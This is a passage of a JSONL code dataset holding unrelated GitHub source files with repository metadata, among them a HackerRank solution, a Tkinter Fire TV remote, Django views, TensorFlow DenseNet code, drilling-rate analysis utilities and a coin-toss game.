section],\n key=lambda x: x['year'],\n reverse=True)\n\n def generate_section(self, section):\n output = [self._load_template(section, '-head.tmpl')]\n entry_template = self._load_template(section, '-entry.tmpl')\n for entry in self._get_relevant_entries(section):\n entry = Entry(self.template).format_entry(entry)\n output.append(entry_template.format(**entry))\n\n # set citation key\n entry['citation'] = entry['entry_' + section]\n self.supplemental_material.generate(entry)\n output.append(self._load_template(section, '-foot.tmpl'))\n return output\n\n def generate_output(self):\n output = [self._load_template('', 'head.tmpl')]\n for section in self.template.ENTRY_ORDER:\n output.extend(self.generate_section(section))\n output.append(self._load_template('', 'foot.tmpl'))\n\n with open(os.path.join(self.output_dir,\n self.template.OUTFILE), 'w') as f:\n f.write('\\n'.join(output).replace(' . ', '. '))\n","repo_name":"AlbertWeichselbraun/bibPublish","sub_path":"src/bibPublish/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11578421138","text":"\"\"\"\nAuthor: William Meira\nDate: 2020-05-07\nPlatform: HackerRank\nType: Interview\nLevel: Easy\nLink: https://www.hackerrank.com/challenges/2d-array/\n\"\"\"\n\n\nimport os\n\n\ndef hourglass_sum(arr):\n return max([arr[row - 1][col - 1]\n + arr[row - 1][col]\n + arr[row - 1][col + 1]\n + arr[row][col]\n + arr[row + 1][col - 1]\n + arr[row + 1][col]\n + arr[row + 1][col + 1]\n for row in range(1, 5) for col in range(1, 5)])\n\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n arr = []\n\n for _ in range(6):\n arr.append(list(map(int, input().rstrip().split())))\n\n result = hourglass_sum(arr)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"wmeira/prog-problems","sub_path":"HackerRank/challenges/interview/arrays/2d-array.py","file_name":"2d-array.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"36962008913","text":"from tkinter import *\r\nimport FireTVConnect as firetv\r\ntv=firetv.Connector(\"192.168.1.73\")\r\ntv.Reset()\r\ntv.Connect()\r\ndef test():\r\n print(\"test\")\r\ndef up():\r\n tv.KeyEvent(\"Up\")\r\ndef down():\r\n tv.KeyEvent(\"Down\")\r\ndef select():\r\n tv.KeyEvent(\"Enter\")\r\ndef right():\r\n tv.KeyEvent(\"Right\")\r\ndef left():\r\n tv.KeyEvent(\"Left\")\r\ndef home():\r\n tv.KeyEvent(\"Home\")\r\ndef back():\r\n tv.KeyEvent(\"back\")\r\ndef forward():\r\n tv.KeyEvent(\"forward\")\r\nroot = Tk() \r\nframe = Frame(root) \r\nframe.pack() \r\nbottomframe = Frame(root) \r\nbottomframe.pack( side = BOTTOM ) \r\nredbutton = Button(frame, text = 'Up', fg ='green',command=up) \r\nredbutton.pack( side = TOP) \r\ngreenbutton = Button(frame, text = 'Left', fg ='red',command=left) \r\ngreenbutton.pack( side = LEFT) \r\nbrownbutton = Button(frame, text = 'Select', fg='brown',command=select) \r\nbrownbutton.pack( side = LEFT ) \r\nbluebutton = Button(frame, text ='Right', fg ='blue',command=right) \r\nbluebutton.pack( side = LEFT )\r\nfwbut = Button(bottomframe, text ='FFW', fg ='black',command=forward) \r\nfwbut.pack( side = RIGHT)\r\nplaybut = Button(bottomframe, text ='Play/Pause', fg ='red',command=back) \r\nplaybut.pack( side = BOTTOM) \r\nrevbut = Button(bottomframe, text ='REV', fg ='black',command=back) \r\nrevbut.pack( side = LEFT)\r\nhomebutt = Button(bottomframe, text ='Home', fg ='blue',command=home) \r\nhomebutt.pack( side = BOTTOM)\r\nblackbutton = Button(bottomframe, text ='Down', fg ='black',command=down) \r\nblackbutton.pack( side = BOTTOM)\r\n\r\n\r\n\r\n\r\nroot.mainloop() \r\n","repo_name":"zapinator3000/FireTVConnect","sub_path":"FireTVConnect/remote.py","file_name":"remote.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"29399730319","text":"def palindromo(palabra):\n i=0\n l=len(palabra)-1\n while i<=1:\n if palabra[i]!=palabra[l-i]:\n return False\n i=i+1\n return True\nif __name__==\"__main__\":\n print(palindromo(\"oso\"))\n print(palindromo(\"dinosaurio\"))\n ","repo_name":"pabloschwarzenberg/grader","sub_path":"tema11_ej1/tema11_ej1_df575c560b82c8b84c9e89a4cf76be6a.py","file_name":"tema11_ej1_df575c560b82c8b84c9e89a4cf76be6a.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26966714034","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, redirect\nfrom .forms import UpdateProfile, UpdateUser\nfrom django.contrib import messages\nfrom .forms import CreateProfile\nfrom .models import Profile\n\n\n@login_required\ndef profile(request):\n if request.method == 'POST':\n u_form = UpdateUser(request.POST, instance=request.user)\n p_form = UpdateProfile(request.POST, request.FILES, instance=request.user.profile)\n if u_form.is_valid() and p_form.is_valid():\n u_form.save()\n p_form.save()\n messages.success(request, 'Information has been updated successfully')\n return redirect('profile')\n else:\n u_form = UpdateUser(instance=request.user)\n p_form = UpdateProfile(request.FILES, instance=request.user.profile)\n\n context = {\n 'u_form': u_form,\n 'p_form': p_form\n }\n path = 'users/profile.html'\n return render(request, path, context)\n\n\ndef register(request):\n if request.method == 'POST':\n form = CreateProfile(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n messages.success(request, f'Account has been created successfully for {username}. Please, proceed to Login ')\n return redirect('home')\n\n else:\n form = CreateProfile()\n\n path = 'users/register.html'\n return render(request, path, {'form': form})\n\n","repo_name":"shkhryr/my-blog","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73061418809","text":"import numpy as np\nimport tensorflow as tf\n#tf.enable_eager_execution()\n\ndef getHeadSelectionScores(encode_input, hidden_size_n1, predicate_number):\n def broadcasting(left, right):\n left = tf.transpose(left, perm=[1, 0, 2])\n left = tf.expand_dims(left, 3)\n right = tf.transpose(right, perm=[0, 2, 1])\n right = tf.expand_dims(right, 0)\n B = left + right\n B = tf.transpose(B, perm=[1, 0, 3, 2])\n return B\n encode_input_hidden_size = encode_input.shape[-1].value\n u_a = tf.get_variable(\"u_a\", [encode_input_hidden_size, hidden_size_n1])\n w_a = tf.get_variable(\"w_a\", [encode_input_hidden_size, hidden_size_n1])\n v = tf.get_variable(\"v\", [hidden_size_n1, predicate_number])\n b_s = tf.get_variable(\"b_s\", [hidden_size_n1])\n\n left = tf.einsum('aij,jk->aik', encode_input, u_a)\n right = tf.einsum('aij,jk->aik', encode_input, w_a)\n outer_sum = broadcasting(left, right)\n outer_sum_bias = outer_sum + b_s\n output = tf.tanh(outer_sum_bias)\n g = tf.einsum('aijk,kp->aijp', output, v)\n return g\n\nbatch_size = 2\nsequnce_length = 3\ninit_dimension = 5\nheadselection_mid_level_dimension = 7\npredicate_label_number = 4\ninput_mask = tf.constant([[1, 1, 0], [1, 1, 0]])\n\nsequnce_mask_length = tf.reduce_mean(tf.cast(input_mask, tf.float32)) * sequnce_length\nsequnce_mask_length = tf.cast(sequnce_mask_length, tf.int32)\nprint(\"sequnce_mask_length:\\t\", sequnce_mask_length)\n\nencode_input = tf.constant(np.random.random(size=(batch_size, sequnce_length, init_dimension)), dtype=tf.float32)\nprint(\"encode_input:\\t\", encode_input)\n\nhead_select_scores_matrix = getHeadSelectionScores(encode_input, headselection_mid_level_dimension, predicate_label_number)\nprint(\"head_select_scores_matrix:\\t\", head_select_scores_matrix)\n\n#predicate_head_predictions = tf.argmax(head_select_scores_matrix, axis=-1)\n#print(\"predicate_head_predictions:\\t\", predicate_head_predictions)\nhead_select_scores_matrix_N_predicate = head_select_scores_matrix[:,0:sequnce_mask_length, 0:sequnce_mask_length, 0:1]\nprint(\"head_select_scores_matrix_N_predicate:\\t\", head_select_scores_matrix_N_predicate)\nhead_select_scores_matrix_N_predicate_sum = tf.reduce_sum(head_select_scores_matrix_N_predicate)\nprint(\"head_select_scores_matrix_N_predicate_sum:\\t\", head_select_scores_matrix_N_predicate_sum)\n\nhead_select_sigmoid_scores_matrix = tf.nn.sigmoid(head_select_scores_matrix)\nprint(\"head_select_sigmoid_scores_matrix:\\t\", head_select_sigmoid_scores_matrix)\npredicate_head_predictions = tf.round(head_select_sigmoid_scores_matrix)\npredicate_head_predictions = tf.cast(predicate_head_predictions, tf.int32)\nprint(\"predicate_head_predictions:\\t\", predicate_head_predictions)\n\n\ngold_label = tf.constant(np.random.randint(0, predicate_label_number, size=(batch_size, sequnce_length, sequnce_length)), dtype=tf.int32)\nprint(\"gold_label:\\t\", gold_label)\ngold_label_one_hot = tf.one_hot(gold_label, depth=predicate_label_number, dtype=tf.float32)\nprint(\"gold_label_one_hot:\\t\", gold_label_one_hot)\n\nhead_select_scores_matrix_masked = head_select_scores_matrix[:, 0:sequnce_mask_length, 0:sequnce_mask_length, :]\ngold_label_one_hot_masked = gold_label_one_hot[:, 0:sequnce_mask_length, 0:sequnce_mask_length, :]\nprint(\"head_select_scores_matrix_masked:\\t\", head_select_scores_matrix_masked)\nprint(\"gold_label_one_hot_masked:\\t\", gold_label_one_hot_masked)\n\nsigmoid_cross_entropy_with_logits_masked = tf.nn.sigmoid_cross_entropy_with_logits(logits=head_select_scores_matrix_masked, labels=gold_label_one_hot_masked)\nprint(\"sigmoid_cross_entropy_with_logits_masked:\\t\", sigmoid_cross_entropy_with_logits_masked)\n\n\n\nhead_select_loss_masked = tf.reduce_sum(sigmoid_cross_entropy_with_logits_masked)\nprint(\"head_select_loss_masked:\\t\", head_select_loss_masked)\n\nhead_select_loss_add_N = head_select_loss_masked + head_select_scores_matrix_N_predicate_sum","repo_name":"yuanxiaosc/Multiple-Relations-Extraction-Only-Look-Once","sub_path":"bin/test_head_select_scores.py","file_name":"test_head_select_scores.py","file_ext":"py","file_size_in_byte":3875,"program_lang":"python","lang":"en","doc_type":"code","stars":342,"dataset":"github-code","pt":"77"} +{"seq_id":"22510971136","text":"import unittest\n\nimport sys\n\n\n# class MyTestCase(unittest.TestCase):\n#\n# @unittest.skip(\"demonstrating skipping\")\n# def test_nothing(self):\n# print(\"test nothing\")\n# self.fail(\"shouldn't happen\")\n#\n# # @unittest.skipIf(mylib.__version__ < (1, 3),\n# # \"not supported in this library version\")\n# # def test_format(self):\n# # # Tests that work for only a certain version of the library.\n# # pass\n#\n# @unittest.skipUnless(sys.platform.startswith(\"win\"), \"requires Windows\")\n# def test_windows_support(self):\n# # windows specific testing code\n# print(\"test_windows_support\")\n# pass\n#\n# # def test_maybe_skipped(self):\n# # if not external_resource_available():\n# # self.skipTest(\"external resource not available\")\n# # # test code that depends on the external resource\n# # pass\nclass suiteTest(unittest.TestCase):\n a = 50\n b = 40\n\n def test_add(self):\n \"\"\"Add\"\"\"\n result = self.a + self.b\n print(\"add\")\n self.assertEqual(result, 100)\n\n @unittest.skipIf(a > b, \"Skip over this routine\")\n def test_sub(self):\n \"\"\"sub\"\"\"\n result = self.a - self.b\n self.assertTrue(result == -10)\n\n @unittest.skipUnless(b == 0, \"Skip over this routine\")\n def test_div(self):\n \"\"\"div\"\"\"\n result = self.a / self.b\n self.assertTrue(result == 1)\n\n @unittest.expectedFailure\n def test_mul(self):\n \"\"\"mul\"\"\"\n result = self.a * self.b\n self.assertNotEqual(result, 2000)\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"AnushkaSingh21/pytest","sub_path":"testpy/tests/test_skip.py","file_name":"test_skip.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31458363108","text":"import sys\nfrom api.src.server.instance import server\nfrom api.src.controller import (\n CreateTransaction, \n GetMemoryPoolTransactions,\n GetChain,\n MineBlock,\n ResolveConflicts,\n CreateNode\n)\n\n\nport = sys.argv[1] if len(sys.argv) > 1 else 5000\nserver.run(port=port)","repo_name":"MarcosBB/blockchain-api","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37643434330","text":"import pandas as pd\nimport numpy as np\nimport warnings\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_squared_error\nimport matplotlib.pyplot as plt\nimport os\n\nwarnings.filterwarnings('ignore')\n\n\nclass ROPData:\n def __init__(self):\n self.filepath = ''\n self.data = pd.DataFrame()\n\n def upload(self, filepath):\n self.filepath = filepath\n self.data = pd.read_csv(self.filepath)\n return self\n\n def process(self):\n data = self.data\n data['TimeStamp'] = pd.to_datetime(data['TimeStamp'])\n n = len(data)\n deltaTime = np.zeros(n) * np.nan\n forward = [True] * n\n\n # Calculate time stamp differences\n for i in range(1, n):\n deltaTime[i] = (data['TimeStamp'][i] - data['TimeStamp'][i - 1]).total_seconds()\n forward[i] = True if data['RodCount'][i] > data['RodCount'][i - 1] else False\n\n # average of 2 and 3 for 1st time point only\n deltaTime[0] = np.mean(deltaTime[1:3])\n data['ROP (ft/min)'] = (60 * 10.0 / deltaTime)\n data['deltaTime'] = deltaTime\n data = data[forward]\n # Drops rows with no time change\n data = data.replace([np.inf, -np.inf], np.nan).dropna(subset=[\"ROP (ft/min)\"], how=\"all\")\n data = data.reset_index(drop=True)\n self.data = data\n return self\n\n def filter(self, rop_greater_than=None, rop_less_than=None):\n data = self.data.loc[\n (self.data['Rotation Speed Max (rpm)'] > 0) & (self.data['Rotation Torque Max (ft-lb)'] > 0)]\n if rop_greater_than is not None:\n data = data.loc[data['ROP (ft/min)'] > rop_greater_than]\n if rop_less_than is not None:\n data = data.loc[data['ROP (ft/min)'] < rop_less_than]\n self.data = data\n return self\n\n def add_quartiles(self, num_divisions=4):\n step = 1 / num_divisions\n q = list(np.arange(step, 1, step))\n quartile_cutoffs = np.quantile(self.data['ROP (ft/min)'], q=q)\n\n def separate_quartiles(x, quartile_vec):\n # make a list of range tuples\n l = []\n for i, val in enumerate(quartile_vec):\n l.append((quartile_vec[i - 1], val))\n\n # fix the first and last tuples\n l[0] = (0, l[0][1])\n l.append((l[len(l) - 1][1], 15))\n\n # make a dictionary with the quartiles and their tuples\n d = dict((i + 1, l[i]) for i in range(len(l)))\n\n # look up the quartile\n for i in d:\n rng = d.get(i)\n if rng[0] <= x < rng[1]:\n quartile = i\n\n return quartile\n\n self.data['quartiles'] = self.data['ROP (ft/min)'].apply(lambda x: separate_quartiles(x, quartile_cutoffs))\n # self.data['quartiles'] = pd.qcut(self.data['ROP (ft/min)'], num_divisions,\n # labels=np.arange(start=1, stop=num_divisions + 1)[::-1],\n # duplicates='drop')\n return self\n\n def list_columns(self):\n return self.data.columns\n\n# def train_test_split(self, train_proportion):\n \n def train_model(self, model, train_proportion=0.8, features='all'):\n if features.lower() == 'all':\n data = self.data.select_dtypes([float, int]).drop(\n columns=['Latitude', 'Longitude', 'RodCount', 'deltaTime'])\n else:\n assert 'ROP (ft/min)' in features, \"Features list must contain ROP measurement.\"\n data = self.data[features].select_dtypes([float, int]).drop(\n columns=['Latitude', 'Longitude', 'RodCount', 'deltaTime'])\n\n X = data.drop(columns=['ROP (ft/min)'])\n y = data['ROP (ft/min)']\n\n X_train, X_test, y_train, y_test = train_test_split(X, y, train_size=train_proportion, random_state=42)\n\n model.fit(X_train, y_train)\n test_predictions = model.predict(X_test)\n rmse = np.sqrt(mean_squared_error(test_predictions, y_test))\n\n return model, test_predictions, rmse\n\n def pdp_plots(self, trained_model, save_dir=None):\n data = self.data.select_dtypes([float, int]).drop(columns=['Latitude', 'Longitude', 'RodCount', 'deltaTime'])\n X = data.drop(columns=['ROP (ft/min)'])\n y = data['ROP (ft/min)']\n\n # Median Dataset Plots\n prediction_list = []\n delta_column_list = []\n for column in X.columns:\n # Create array for the variable being changed\n delta_column = np.linspace(int(min(X[column])), int(max(X[column])), 100000)\n df = pd.DataFrame(delta_column)\n # Create columns for all variables with the median values\n df['Rotation Speed Max (rpm)'] = np.median(X['Rotation Speed Max (rpm)'])\n df['Rotation Torque Max (ft-lb)'] = np.median(X['Rotation Torque Max (ft-lb)'])\n df['Thrust Force Max (lbf)'] = np.median(X['Thrust Force Max (lbf)'])\n df['Mud Flow Rate Avg (gpm)'] = np.median(X['Mud Flow Rate Avg (gpm)'])\n df['Mud Pressure Max (psi)'] = np.median(X['Mud Pressure Max (psi)'])\n df['Thrust Speed Avg (ft/min)'] = np.median(X['Thrust Speed Avg (ft/min)'])\n df['Pull Force Maximum (lbf)'] = np.median(X['Pull Force Maximum (lbf)'])\n df['Pull Speed Average (ft/min)'] = np.median(X['Pull Speed Average (ft/min)'])\n df['Drill String Length (ft)'] = np.median(X['Drill String Length (ft)'])\n # Delete the median column for the column being changed\n del df[column]\n # Rename the delta_column array to the column of interest\n df = df.rename(columns={0: column})\n # Reorder the columns to the match model requirements\n df = df[\n ['Rotation Speed Max (rpm)', 'Rotation Torque Max (ft-lb)', 'Thrust Force Max (lbf)',\n 'Mud Flow Rate Avg (gpm)',\n 'Mud Pressure Max (psi)', 'Thrust Speed Avg (ft/min)', 'Pull Force Maximum (lbf)',\n 'Pull Speed Average (ft/min)',\n 'Drill String Length (ft)']]\n\n # Predict with model and plot\n prediction = trained_model.predict(df)\n\n prediction_list.append([column, prediction])\n delta_column_list.append([column, delta_column])\n\n # Loops through all\n prediction = dict(prediction_list)\n delta_column_dict = dict(delta_column_list)\n for key in prediction:\n quartiles = np.quantile(prediction[key], q=[0.25, 0.5, 0.75])\n quartile1 = quartiles[2]\n quartile2 = quartiles[1]\n quartile3 = quartiles[0]\n\n q1_y = prediction[key][prediction[key] >= quartile1]\n q2_y = prediction[key][(prediction[key] < quartile1) & (prediction[key] >= quartile2)]\n q3_y = prediction[key][(prediction[key] < quartile2) & (prediction[key] >= quartile3)]\n q4_y = prediction[key][(prediction[key] < quartile3) & (prediction[key] >= min(prediction[key]))]\n\n x1 = delta_column_dict[key][(prediction[key] >= quartile1).nonzero()[0]]\n x2 = delta_column_dict[key][((prediction[key] < quartile1) & (prediction[key] >= quartile2)).nonzero()[0]]\n x3 = delta_column_dict[key][((prediction[key] < quartile2) & (prediction[key] >= quartile3)).nonzero()[0]]\n x4 = delta_column_dict[key][\n ((prediction[key] < quartile3) & (prediction[key] >= min(prediction[key]))).nonzero()[0]]\n\n plt.figure(figsize=(10, 5))\n plt.plot(x1, q1_y, '.', markersize=8, label='Q1')\n plt.plot(x2, q2_y, '.', markersize=8, label='Q2')\n plt.plot(x3, q3_y, '.', markersize=8, label='Q3')\n plt.plot(x4, q4_y, '.', markersize=8, label='Q4')\n plt.plot(delta_column_dict[key], prediction[key], 'k-', linewidth=0.5)\n plt.xlabel(key)\n plt.ylabel('ROP (ft/min)')\n plt.title(key)\n plt.legend()\n\n if save_dir is not None:\n fp = save_dir + str(key) + '.jpg'\n if not os.path.exists(fp):\n plt.savefig(fp)\n\n plt.show()\n","repo_name":"pvankatwyk/vermeer-training","sub_path":"data-engineering/rop_utils.py","file_name":"rop_utils.py","file_ext":"py","file_size_in_byte":8240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25728730237","text":"import sys\r\ninput = sys.stdin.readline\r\nN, M = map(int, input().split())\r\ndays_money = []\r\nfor i in range(N):\r\n days_money.append(int(input()))\r\n\r\n# 한번 꺼낼 때 K원을 인출하고, M번 꺼낼 수 있음. -> K원을 구함\r\n# 최소 금액 -> 하루에 쓰는 금액 중 max, 최대 금액 -> 전체 쓸 금액 합\r\nstart = max(days_money)\r\nend = sum(days_money)\r\nK = 0\r\nwhile start<=end :\r\n mid = (start+end)//2\r\n cnt = 0\r\n left = 0\r\n for money in days_money:\r\n if left < money :\r\n cnt +=1\r\n left = mid\r\n left -= money\r\n\r\n if cnt > M :\r\n start = mid + 1\r\n else : # M보다 작을 경우 (넣었다 뺏다 해주면서 M을 맞춰줄 수 있는 경우임)\r\n K = mid\r\n end = mid - 1 # 더 작은 K값을 찾기 위해 계속 탐색\r\n\r\nprint(K)\r\n","repo_name":"myejin/ALGO_STUDY_123","sub_path":"이분탐색/jieun/6236_용돈 관리.py","file_name":"6236_용돈 관리.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"18438520895","text":"from random import randint, choice\n\n###########################################################################################\n# Name: Ante Zovko\n# Date: February 8th, 2020\n# Description: A game of heads and tails with two coins where Group A gets a point if \n# the result is two heads, Group B gets a point if the result is two tails\n# and the Prof gets a point if it is heads/tails or tails/heads\n###########################################################################################\n\n\n# The coin class\nclass Coin(object):\n\n headsSide = \"Heads\"\n tailsSide = \"Tails\"\n \n # Randomly returns heads or tails when called\n def flip(self):\n randomNumber = randint(0, 1)\n\n if(randomNumber == 1):\n return self.headsSide\n else:\n return self.tailsSide\n\n# Two coin objects\nfirstCoin = Coin()\nsecondCoin = Coin()\n\n# The game\n# Params: Number of games and tosses per each game\n# Returns: The result of every game as a list\ndef game(numOfGames, tossesPerGame):\n groupA = 0\n groupB = 0\n prof = 0\n allGames = []\n\n # The outer loop keeps track of games\n for i in range(numOfGames): \n # The inner loop keeps track of tosses in each game\n for j in range(tossesPerGame):\n groupA, groupB, prof = coinTossTracker(groupA, groupB, prof)\n\n # Append each result to the list\n allGames.append(groupA)\n allGames.append(groupB)\n allGames.append(prof)\n \n # Reset scores for next game\n groupA, groupB, prof = 0, 0, 0\n\n return allGames\n \n \n# Keeps track of the score for the game\n# Params: The players' current score\n# Return: The players' current score and the\n# the player who won incremented by 1\ndef coinTossTracker(groupA, groupB, prof):\n if(firstCoin.flip() == \"Heads\" and secondCoin.flip() == \"Heads\"):\n return groupA + 1, groupB, prof\n\n elif(firstCoin.flip() == \"Tails\" and secondCoin.flip() == \"Tails\"):\n return groupA, groupB + 1, prof\n\n else:\n return groupA, groupB, prof + 1\n\n# Handles Input from the client-side\n# Params: The message for the user\ndef inputValidation(message):\n while True:\n try:\n desiredVar = int(raw_input(message))\n if(desiredVar <= 0):\n print(\"Please enter a number bigger than 0!\\n\")\n continue\n else:\n return desiredVar\n\n except ValueError:\n print(\"Please enter a number!\\n\")\n continue\n\n# Creates the layout that displays the statistics\n# about the game(s)\n# Params: Number of games, tosses and the results of each game\ndef outputLayout(numOfGames, numOfTosses, allGames):\n\n # Keeps track of total wins\n groupAWins = 0\n groupBWins = 0\n profWins = 0\n \n # Casts to float for division\n numOfTosses = float(numOfTosses)\n flNumOfGames = float(numOfGames)\n\n # Displays each game and its statistics\n for i in range(numOfGames):\n print(\"Game {}\\n Group A: {} ({}%); Group B: {} ({}%); Prof: {} ({}%);\".format(i, allGames[i*3], round((allGames[i*3]/numOfTosses)*100, 2),allGames[(i*3)+1], \n round((allGames[(i*3)+1]/numOfTosses)*100, 2),allGames[(i*3)+2], round((allGames[(i*3)+2]/numOfTosses)*100, 2)))\n \n # Creates a list with the three current scores\n wins = [allGames[i*3], allGames[(i*3)+1], allGames[(i*3)+2]]\n \n # Checks if there are duplicates by counting how many maxes there are\n if(wins.count(max(wins)) > 1):\n # Gets the duplicates positions in the list\n maxPositions = list_duplicates_of(wins, max(wins))\n # Picks a random winner\n winner = choice(maxPositions)\n else:\n # Winner is the player with the highest index\n winner = wins.index(max(wins))\n\n # Increments total wins for the\n # corresponding player\n if(winner == 0):\n groupAWins += 1\n elif(winner == 1):\n groupBWins += 1\n elif(winner == 2):\n profWins += 1\n\n # Displays the total statistics\n print(\"Wins: Group A: {} ({}%); Group B: {} ({}%); Prof: {} ({}%)\".format(groupAWins, round((groupAWins/flNumOfGames)*100, 2), groupBWins, round((groupBWins/flNumOfGames)*100, 2),\n profWins, round((profWins/flNumOfGames)*100), 2))\n\n\n# Finds the positions of duplicates in a list\n# Params: list, item to find\n# Returns: List of duplicate positions\n# Found on: https://stackoverflow.com/questions/5419204/index-of-duplicates-items-in-a-python-list\ndef list_duplicates_of(seq,item):\n start_at = -1\n locs = []\n while True:\n try:\n loc = seq.index(item,start_at+1)\n except ValueError:\n break\n print(\"Here\")\n else:\n locs.append(loc)\n start_at = loc\n return locs\n\n# Main\nnumOfGames = inputValidation(\"How many games? \")\nnumOfTosses = inputValidation(\"How many coin tosses per game? \")\n\noutputLayout(numOfGames, numOfTosses, game(numOfGames, numOfTosses))\n\n","repo_name":"AnteZovko23/University-Assignments-and-Projects","sub_path":"Python/CS 131-The Science of Computing II/Assignments/FoolProofGame.py","file_name":"FoolProofGame.py","file_ext":"py","file_size_in_byte":5076,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"71473059130","text":"import tensorflow as tf\nimport numpy as np\n\ndef conv_layer(input, filter, kernel, stride=1, layer_name='conv'):\n with tf.name_scope(layer_name):\n net = tf.layers.conv2d(inputs=input,\n use_bias=False,\n filters=filter,\n kernel_size=kernel,\n strides=stride,\n padding='SAME')\n return net\n\ndef Global_average_pooling(x, stride=1):\n width = np.shape(x)[1]\n height = np.shape(x)[2]\n pool_size = [width, height]\n return tf.layers.average_pooling2d(inputs=x, pool_size=pool_size, strides=stride) # The stride value does not matter\n\ndef Batch_norm(x, training, scope):\n return tf.cond(\n training,\n lambda : tf.layers.batch_normalization(\n inputs=x,\n trainable=True,\n reuse=None,\n name=scope),\n lambda : tf.layers.batch_normalization(\n inputs=x,\n trainable=False,\n reuse=True,\n name=scope)\n )\n\ndef Drop_out(x, rate, training):\n return tf.layers.dropout(inputs=x, rate=rate, training=training)\n\ndef Relu(x):\n return tf.nn.relu(x)\n\ndef Average_pooling(x, pool_size=[2, 2], stride=2, padding='VALID'):\n return tf.layers.average_pooling2d(inputs=x, pool_size=pool_size, strides=stride, padding=padding)\n\ndef Max_pooling(x, pool_size=[3, 3], stride=2, padding='VALID'):\n return tf.layers.max_pooling2d(inputs=x, pool_size=pool_size, strides=stride, padding=padding)\n\ndef Concatenation(layers):\n return tf.concat(layers, axis=3)\n\nclass DenseNet():\n def __init__(self, x, nb_blocks, filters, training, dropout_rate):\n self.nb_blocks = nb_blocks\n self.filters = filters\n self.training = training\n self.dropout_rate = dropout_rate\n self.logits = self.densenet(x)\n\n def bottle_neck_layer(self, x, scope):\n with tf.name_scope(scope):\n x = Batch_norm(x, training=self.training, scope='%s_batch1' % scope)\n x = Relu(x)\n x = conv_layer(x, filter=4 * self.filters, kernel=[1, 1], layer_name= '%s_conv1' % scope)\n x = Drop_out(x, rate=self.dropout_rate, training=self.training)\n\n x = Batch_norm(x, training=self.training, scope='%s_batch2' % scope)\n x = Relu(x)\n x = conv_layer(x, filter=self.filters, kernel=[3, 3], layer_name='%s_batch2' % scope)\n x = Drop_out(x, rate=self.dropout_rate, training=self.training)\n\n return x\n\n def transition_layer(self, x, scope):\n with tf.name_scope(scope):\n x = Batch_norm(x, training=self.training, scope='%s_batch1' % scope)\n x = Relu(x)\n x = conv_layer(x, filter=self.filters, kernel=[1, 1], layer_name='%s_conv1' % scope)\n x = Drop_out(x, rate=self.dropout_rate, training=self.training)\n x = Average_pooling(x, pool_size=[2, 1], stride=1)\n return x\n\n def dense_block(self, input_x, nb_layers, layer_name):\n with tf.name_scope(layer_name):\n layer_concat = list()\n layer_concat.append(input_x)\n\n x = self.bottle_neck_layer(input_x, scope='%s_bottleN_%d' % (layer_name, 0))\n\n layer_concat.append(x)\n\n for i in range(nb_layers - 1):\n x = Concatenation(layer_concat)\n x = self.bottle_neck_layer(x, scope='%s_bottleN_%d' % (layer_name, i + 1))\n layer_concat.append(x)\n\n x = Concatenation(layer_concat)\n return x\n\n def densenet(self, input_x):\n x = conv_layer(input_x, filter= 2 * self.filters, kernel=[5, 5], stride=2, layer_name='conv0')\n x = self.dense_block(input_x=x, nb_layers=3, layer_name='dense_1')\n x = self.transition_layer(x, scope='trans_1')\n\n x = self.dense_block(input_x=x, nb_layers=6, layer_name='dense_2')\n x = self.transition_layer(x, scope='trans_2')\n\n x = self.dense_block(input_x=x, nb_layers=3, layer_name='dense_3')\n x = Batch_norm(x, training=self.training, scope='linear_batch')\n x = Relu(x)\n x = Global_average_pooling(x)\n return x","repo_name":"jiapengzhu5/RDense","sub_path":"RDense/Densenet.py","file_name":"Densenet.py","file_ext":"py","file_size_in_byte":4201,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"29665211746","text":"__author__ = 'Lydia Letaru & Rufai Balogun'\n__date__ = '2021-09-04'\n__copyright__ = '(C) 2021 by Lydia Letaru & Rufai Balogun'\n\n# This will get replaced with a git SHA1 when you do a git archive\n\n__revision__ = '$Format:%H$'\n\nimport os\nimport sys\nimport inspect\n\nfrom qgis.core import QgsProcessingAlgorithm, QgsApplication\nfrom .LandscapeMetrics_provider import LandscapeMetricsProvider\n\ncmd_folder = os.path.split(inspect.getfile(inspect.currentframe()))[0]\n\nif cmd_folder not in sys.path:\n sys.path.insert(0, cmd_folder)\n\n\nclass LandscapeMetricsPlugin(object):\n\n def __init__(self):\n self.provider = None\n\n def initProcessing(self):\n \"\"\"Init Processing provider for QGIS >= 3.8.\"\"\"\n self.provider = LandscapeMetricsProvider()\n QgsApplication.processingRegistry().addProvider(self.provider)\n\n def initGui(self):\n self.initProcessing()\n\n def unload(self):\n 